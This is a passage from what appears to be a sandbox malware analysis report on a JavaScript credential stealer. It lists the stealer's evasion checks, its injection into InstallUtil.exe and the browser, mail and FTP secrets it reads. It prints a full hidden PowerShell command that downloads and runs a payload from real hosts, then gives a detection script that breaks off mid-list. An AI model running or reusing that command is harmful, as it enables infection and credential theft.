                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -98120s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -98015s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -97904s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -97790s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -97681s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -97307s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -97200s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -97092s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 100000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99890
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99781
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99669
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99563
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99453
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99342
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99207
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98940
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98813
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98688
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98563
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98438
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98313
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98202
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98094
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97969
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97859
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97641
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97521
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97391
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97266
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97156
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97047
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96938
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96813
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99875
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99764
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99655
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99546
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99437
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99325
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99217
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99105
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98890
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98781
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98666
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98562
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98451
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98343
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98234
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98120
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98015
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97904
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97790
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97681
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97307
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97200
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97092
                      Source: wscript.exe, 00000000.00000003.2025742948.000001D4AC28E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2024849450.000001D4ABB64000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WqkbkaAcxetWUzQemUedKoeNKlomWecKmZPaPBCgLPTeKaNTLiLGhhUANRlWvfaUmkATzlWOlNLLeQkAKPfkrSPGLt
                      Source: wscript.exe, 00000000.00000003.2025742948.000001D4AC28E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: xATZJqWZtBqemUqLPzhAsJZuZhteUWIGskiRzLcZiaxBUcxndQUgOdqnLUPLhodOLZbNfOHcuWCccLpoooZUkLAKqi
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
                      Source: wscript.exe, 00000000.00000003.2019675088.000001D4ABB6A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ZxATZJqWZtBqemUqLPzhAsJZuZhteUWIGskiRzLcZiaxBUcxndQUgOdqnLUPLhodOLZbNfOHcuWCccLpoooZUkLAKqiBhe
                      Source: wscript.exe, 00000000.00000003.2026096461.000001D4ABF1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025742948.000001D4AC28E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025841554.000001D4A9D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025967402.000001D4ABE81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018985410.000001D4ABC48000.00000004.00000020.00020000.00000000.sdmp, RFQ448903423_MAT_HASUE_de_Mexico.js Binary or memory string: var dpLNNqPKJbePbzZGGLLfzziaZGNnkORbmWitczOKNbncUvThUPibnascULGWeTaIugNHmtfifltLfGPcjABAcKLWWB = "xATZJqWZtBqemUqLPzhAsJZuZhteUWIGskiRzLcZiaxBUcxndQUgOdqnLUPLhodOLZbNfOHcuWCccLpoooZUkLAKqi";
                      Source: InstallUtil.exe, 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: vmware
                      Source: wscript.exe, 00000000.00000003.2020928827.000001D4ABDF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026096461.000001D4ABF1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025742948.000001D4AC28E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025841554.000001D4A9D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025967402.000001D4ABE81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018985410.000001D4ABC48000.00000004.00000020.00020000.00000000.sdmp, RFQ448903423_MAT_HASUE_de_Mexico.js Binary or memory string: var WqkbkaAcxetWUzQemUedKoeNKlomWecKmZPaPBCgLPTeKaNTLiLGhhUANRlWvfaUmkATzlWOlNLLeQkAKPfkrSPGLt = "UBehRkbeNiseNfpnZqLivcAkiNgcqRWzJxcGKWfcGBrxsWWQUeozoceUKmifhUpGLGZWZpbxKKrZGKobkghIbiaRid";
                      Source: wscript.exe, 00000000.00000003.2019165000.000001D4ABC30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ZWqkbkaAcxetWUzQemUedKoeNKlomWecKmZPaPBCgLPTeKaNTLiLGhhUANRlWvfaUmkATzlWOlNLLeQkAKPfkrSPGLt@
                      Source: InstallUtil.exe, 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: VMwareVBox
                      Source: InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: powershell.exe, 00000004.00000002.2144271761.000001CEE97E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

                      Anti Debugging

                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_00BC70B0 CheckRemoteDebuggerPresent, 8_2_00BC70B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: Yara match File source: amsi64_1964.amsi.csv, type: OTHER
                      Source: Yara match File source: Process Memory Space: powershell.exe PID: 768, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: powershell.exe PID: 1964, type: MEMORYSTR
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? 
V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB?
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 442000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 6B1008
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 4.2.powershell.exe.1ce9038cb90.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000008.00000002.3317780029.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.3317780029.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1964, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 1632, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara match | File source: 4.2.powershell.exe.1ce9038cb90.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1964, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 1632, type: MEMORYSTR
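                      The file and registry opens listed above are the stealer's sweep: InstallUtil.exe, a signed .NET framework utility that has no business reading browser, mail or FTP client secrets, touches Chrome/Edge Login Data and Cookies, Firefox-family profiles.ini and cookies.sqlite, Thunderbird and IncrediMail profiles, the Windows Messaging Subsystem profile key, WinSCP sessions and FTP Navigator's Ftplist.txt in one run. The following Python is an added hunting heuristic written for this page, not code from the Joe Sandbox report: it classifies file/registry access events into credential-store families, exempts each store's own client, and alerts on any process that sweeps several families. The event list is constructed from the entries above (PID 1632 is the InstallUtil.exe PID the report gives) plus one benign Chrome event for contrast; the store catalogue, the owner table and the threshold are this example's assumptions.

```python
"""Hunting heuristic for the credential-store sweep shown in this section.

Added example for this page, not code from the Joe Sandbox report.  The
event list is constructed from the 'File opened' / 'Key opened' entries
above plus one benign event for contrast.  The store catalogue, the owner
table and the threshold are this example's assumptions; extend per estate.
"""
import re
from collections import defaultdict

# Stores that hold browser, mail and FTP/SSH client secrets.  Patterns are
# regexes over the full path or registry key; first matching category wins,
# so the specific mail entries are checked before the browser profiles.ini.
CREDENTIAL_STORES = {
    "mail": [
        r"\\Thunderbird\\profiles\.ini$",
        r"\\Windows Messaging Subsystem\\Profiles$",
        r"\\IncrediMail\\Identities$",
    ],
    "browser": [
        r"\\User Data\\[^\\]+\\Login Data$",
        r"\\User Data\\[^\\]+\\Network\\Cookies$",
        r"\\Firefox\\Profiles\\[^\\]+\\cookies\.sqlite$",
        r"\\(Mozilla\\Firefox|NETGATE Technologies\\BlackHawk|8pecxstudios\\Cyberfox)\\profiles\.ini$",
    ],
    "ftp_ssh": [
        r"\\WinSCP 2\\Sessions$",
        r"\\FTP Navigator\\Ftplist\.txt$",
    ],
}

# Processes allowed to read one family of store (their own).  A framework
# utility such as InstallUtil.exe is deliberately not on this list.
OWNERS = {
    "chrome.exe": "browser", "msedge.exe": "browser", "firefox.exe": "browser",
    "thunderbird.exe": "mail", "winscp.exe": "ftp_ssh",
}

# (process, pid, event kind, path) tuples, constructed from the report.
SAMPLE_EVENTS = [
    ("InstallUtil.exe", 1632, "key", r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    ("InstallUtil.exe", 1632, "file", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite"),
    ("InstallUtil.exe", 1632, "file", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"),
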